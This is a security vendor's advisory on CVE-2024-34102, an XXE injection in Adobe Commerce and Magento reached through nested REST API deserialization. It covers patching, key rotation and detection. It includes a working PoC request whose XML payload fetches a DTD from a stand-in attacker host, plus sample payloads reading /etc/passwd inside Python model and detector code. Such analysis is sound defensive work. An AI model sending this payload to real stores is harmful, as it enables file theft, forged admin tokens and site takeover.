Vulnerability report by the TA team: analysis of the "Adobe Commerce & Magento XML External Entity (XXE) Injection" vulnerability
Adobe Commerce & Magento XML External Entity(XXE) Injection
The vulnerability is an XML External Entity (XXE) Injection in Magento, the open source platform that Adobe Commerce is built on. An attacker can submit malicious XML in the JSON body of an unauthenticated REST API request so that it is parsed by a class the endpoint was never meant to instantiate, which allows internal files to be read and, chained with a second vulnerability, arbitrary code to be executed.
The vulnerability is fixed by the security patches Adobe released in June 2024. Attacks against it are detected by our AIWAF products through the existing patterns for XML External Entity (XXE) Injection.
1. Overview
Adobe Commerce, the Adobe-backed eCommerce platform, is built on the open source Magento. According to BuiltWith, around 120,000 live sites currently use Magento, and it accounts for 1.12% of the top 100,000 websites.
Source: https://trends.builtwith.com/shop/Magento
Among the many vulnerabilities found in the product, we analyzed the recently announced XML External Entity (XXE) Injection vulnerability, CVE-2024-34102.
Source: https://thehackernews.com/2022/02/critical-magento-0-day-vulnerability.html
2. Attack Process
In June 2024, Adobe released patches for a number of security issues in Adobe Commerce and Magento, and later published a separate isolated patch for CVE-2024-34102 that can be applied on its own.
Magento is a PHP web application that provides both a user interface and an API. The API is also exposed as a REST API, and Magento maps the JSON body of a REST request onto objects as follows.
Example request:
POST /rest/default/V1/carts/mine/estimate-shipping-methods HTTP/1.1
Host: foo.example
Content-Type: application/json
Content-Length: 1402

{
    "address": {
        "data": [1, 2, 3],
        "BaseShippingAmount": 123
    }
}
- If a key in the JSON body matches the name of a parameter of the target class's constructor, the value is passed as that constructor argument. If the parameter is typed as a class and the value is a JSON object, that object is mapped the same way to build the nested class first.
- If no constructor parameter matches, Magento looks for a setter method on the class named set<Key> and calls it with the value.
In the request above, the constructor of the Address class has an array-typed data parameter, so the data field is passed to it. After the object is instantiated, several methods are called that use the stored data.
Because this mapping is applied recursively to every parameter, a request can walk from the constructor parameters of one class into those of another and instantiate classes that the developer never intended to expose to API input.
According to Assetnote, which analyzed the vulnerability, this nested deserialization can be driven to the PHP SimpleXMLElement class, whose constructor parses whatever XML string it is given, so the instantiation issue becomes an XXE. Their research confirmed that SimpleXMLElement can be reached and instantiated by sending malicious XML in the sourceData parameter of a request to /rest/all/V1/guest-carts/test-assetnote/estimate-shipping-methods (test-assetnote is the placeholder cart ID Assetnote used).
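The following Python model is an added illustration, not Magento's code (which is PHP) and not Assetnote's research code. It re-implements the two mapping rules described above so that the nested-instantiation problem can be run offline. The class names mirror the parameter chain seen in the request bodies but are hypothetical stand-ins; XmlSink stands in for SimpleXMLElement and only records the SYSTEM identifiers a DTD declares instead of parsing anything; and the allowlist hardening at the end is one plausible defence, not Adobe's actual patch.

```python
"""Toy model of Magento's REST input mapping (added illustration, not Magento
code). Each JSON key becomes a constructor argument of the target class,
recursing when the parameter is typed as a class, or a set<Key>() call.
All class names are hypothetical stand-ins for this example."""
import inspect
import re
from typing import Any, Dict, Iterable, List, Optional, Type


class XmlSink:
    """Stand-in for PHP's SimpleXMLElement, whose constructor parses the XML it
    is given. Nothing is parsed here: we only extract the SYSTEM identifiers
    the DTD declares, i.e. what libxml would fetch with DTD loading enabled."""
    _entity = re.compile(r'<!ENTITY\s+(?:%\s*)?\w+\s+SYSTEM\s+["\']([^"\']+)["\']')

    def __init__(self, data: str, options: int = 0) -> None:
        self.data = data
        self.options = options            # 16 in the PoC (libxml LIBXML_DTDVALID)
        self.external_refs: List[str] = self._entity.findall(data)


# Hypothetical service classes forming the same parameter chain as the PoC body.
class TotalCollector:
    def __init__(self, sourceData: XmlSink = None) -> None:
        self.sourceData = sourceData


class CollectorList:
    def __init__(self, totalCollector: TotalCollector = None) -> None:
        self.totalCollector = totalCollector


class TotalsReader:
    def __init__(self, collectorList: CollectorList = None) -> None:
        self.collectorList = collectorList


class Address:
    """The intended API target: a data object with a 'data' constructor
    argument and a setter for fields that are not constructor arguments."""
    def __init__(self, data: list = None, totalsReader: TotalsReader = None) -> None:
        self.data = data or []
        self.totalsReader = totalsReader
        self.base_shipping_amount = None

    def setBaseShippingAmount(self, value: Any) -> None:
        self.base_shipping_amount = value


def build(cls: Type, payload: Dict[str, Any],
          allowed: Optional[Iterable[Type]] = None) -> Any:
    """Map JSON keys onto constructor parameters, recursing into parameters
    whose annotation is a class, and otherwise onto set<Key>() methods.
    allowed=None reproduces the permissive behaviour; with an allowlist,
    nested objects are only built for explicitly approved data classes."""
    params = inspect.signature(cls.__init__).parameters
    hints = cls.__init__.__annotations__      # raw annotations, no Optional wrapping
    kwargs: Dict[str, Any] = {}
    leftovers: Dict[str, Any] = {}
    for key, value in payload.items():
        if key in params and key != "self":
            hint = hints.get(key)
            if isinstance(value, dict) and inspect.isclass(hint):
                if allowed is not None and hint not in allowed:
                    raise ValueError(f"refusing to build {hint.__name__} for '{key}'")
                value = build(hint, value, allowed)   # the recursion the text describes
            kwargs[key] = value
        else:
            leftovers[key] = value
    obj = cls(**kwargs)
    for key, value in leftovers.items():
        setter = getattr(obj, "set" + key[:1].upper() + key[1:], None)
        if setter is None:
            raise ValueError(f"unknown field '{key}'")
        setter(value)
    return obj


# Constructed request bodies: the benign example and the PoC's shape.
BENIGN_BODY = {"address": {"data": [1, 2, 3], "BaseShippingAmount": 123}}
POC_BODY = {"address": {"totalsReader": {"collectorList": {"totalCollector": {
    "sourceData": {
        "data": '<?xml version="1.0" ?><!DOCTYPE r [ <!ENTITY % sp SYSTEM '
                '"http://your_ip:9999/dtd.xml"> %sp; %param1; ]><r>&exfil;</r>',
        "options": 16}}}}}}


def reached_external_refs(body: Dict[str, Any],
                          allowed: Optional[Iterable[Type]] = None) -> List[str]:
    """Build the Address from a body and report which external resources the
    (unintended) XML sink would have fetched; [] means the sink was never reached."""
    addr = build(Address, body["address"], allowed)
    collector = getattr(getattr(addr.totalsReader, "collectorList", None),
                        "totalCollector", None)
    sink = getattr(collector, "sourceData", None)
    return sink.external_refs if sink is not None else []


if __name__ == "__main__":
    print(reached_external_refs(BENIGN_BODY))   # []
    print(reached_external_refs(POC_BODY))      # ['http://your_ip:9999/dtd.xml']
    try:
        reached_external_refs(POC_BODY, allowed={Address})
    except ValueError as exc:
        print("hardened:", exc)
```

The benign body never leaves the Address class, while the PoC-shaped body walks four constructor parameters deep and hands attacker text to the XML sink's constructor. Restricting recursion to an allowlist of data classes stops the walk at the first service-type parameter, which is the property any fix for this class of bug has to provide.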
PoC:
POST /rest/all/V1/guest-carts/test-assetnote/estimate-shipping-methods HTTP/2
Host: example.com
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Content-Type: application/json
Content-Length: 274

{
    "address": {
        "totalsReader": {
            "collectorList": {
                "totalCollector": {
                    "sourceData": {
                        "data": "<?xml version=\"1.0\" ?> <!DOCTYPE r [ <!ENTITY % sp SYSTEM \"http://your_ip:9999/dtd.xml\"> %sp; %param1; ]> <r>&exfil;</r>",
                        "options": 16
                    }
                }
            }
        }
    }
}
Here your_ip is the attacker's host. The internal DTD subset declares an external parameter entity %sp that points at an attacker-controlled DTD, and "options": 16 is libxml's LIBXML_DTDVALID flag, which makes the parser load and process the DTD when SimpleXMLElement is constructed. The %param1; and &exfil; entities are not declared in the request, so they must be defined by the fetched DTD; that is where the attacker chooses which file to read and how to carry its contents out.
The vulnerability enables the following attacks:
- Reading /app/etc/env.php, which stores the key Magento uses to sign the JWT tokens used for API authentication; with that key an attacker can forge arbitrary admin JWT tokens.
- Remote code execution when combined with CVE-2024-2961 (a buffer overflow in glibc's iconv that can be triggered from PHP).
- Reading arbitrary local files and fetching the contents of remote URLs from the server.
3. What to do
Adobe has released a security patch for this vulnerability; applying it removes the issue. Because the attack can read the JWT signing key from env.php, a site that was exposed before patching should also rotate that key, since the patch alone does not invalidate tokens forged with a stolen key.
Our AIWAF products detect this attack with the existing "409: XML External Entity" pattern, which detects XML External Entity (XXE) Injection attacks.
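As an added example (not the AIWAF pattern itself, whose logic is not reproduced here), the following Python shows the property a detection for this attack has to have: the XML never arrives as an XML body but as a string value buried several levels deep inside JSON, with its quotes escaped and possibly its angle brackets written as \u003c, so the inspector must decode the JSON and scan every string at any depth. The request bodies are constructed samples modelled on the example and PoC requests above.

```python
"""Added example: WAF-style inspection of a JSON request body for XXE markers.
Not AIWAF's pattern; sample bodies are constructed for this illustration."""
import json
import re
from typing import Any, Dict, Iterator, List, Tuple

# Markers that only appear when a client is trying to get a DTD processed.
XXE_MARKERS = [
    ("doctype", re.compile(r"<!DOCTYPE\b", re.I)),
    ("entity-decl", re.compile(r"<!ENTITY\b", re.I)),
    ("external-id", re.compile(r"\b(?:SYSTEM|PUBLIC)\s+[\"']", re.I)),
    ("param-entity-ref", re.compile(r"%[A-Za-z_][\w.-]*;")),
]


def _strings(node: Any, path: str = "$") -> Iterator[Tuple[str, str]]:
    """Yield (json-path, value) for every string in a decoded JSON document."""
    if isinstance(node, dict):
        for key, value in node.items():
            yield from _strings(value, f"{path}.{key}")
    elif isinstance(node, list):
        for idx, value in enumerate(node):
            yield from _strings(value, f"{path}[{idx}]")
    elif isinstance(node, str):
        yield path, node


def inspect_json_body(raw: str) -> Dict[str, List[str]]:
    """Return {json-path: [marker names]} for every string that looks like XXE.
    Decoding the JSON first matters: a pattern applied to the raw body would
    see '\\"' and '\\u003c' where the parser will later see '"' and '<'."""
    try:
        doc = json.loads(raw)
    except ValueError:
        return {}          # not JSON; a raw-XML body is a different inspector's job
    findings: Dict[str, List[str]] = {}
    for path, text in _strings(doc):
        hits = [name for name, rx in XXE_MARKERS if rx.search(text)]
        if hits:
            findings[path] = hits
    return findings


# Constructed sample bodies.
BENIGN_BODY = '{"address": {"data": [1, 2, 3], "BaseShippingAmount": 123}}'
POC_BODY = json.dumps({"address": {"totalsReader": {"collectorList": {"totalCollector": {
    "sourceData": {
        "data": '<?xml version="1.0" ?><!DOCTYPE r [ <!ENTITY % sp SYSTEM '
                '"http://your_ip:9999/dtd.xml"> %sp; %param1; ]><r>&exfil;</r>',
        "options": 16}}}}}})
# The same kind of payload with angle brackets JSON-escaped as \u003c / \u003e.
ESCAPED_BODY = r'{"a": {"b": "\u003c!DOCTYPE r [ \u003c!ENTITY x SYSTEM \"file:///etc/passwd\"\u003e ]\u003e"}}'

if __name__ == "__main__":
    for body in (BENIGN_BODY, POC_BODY, ESCAPED_BODY):
        print(inspect_json_body(body))
```

The finding keeps the JSON path, which is useful in a rule: the PoC's marker sits under address.totalsReader.collectorList.totalCollector.sourceData.data, a location no legitimate estimate-shipping-methods request has a reason to populate, so the path alone is a strong signal even before the string content is examined.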
4. Conclusion
This vulnerability in Magento, the platform underlying the widely used Adobe Commerce, can cause serious damage with a single simple request, and the security patch Adobe released should be applied promptly.
Our AIWAF products have patterns in place for vulnerabilities in Adobe Commerce and Magento, and we will continue to respond quickly as related vulnerabilities are discovered.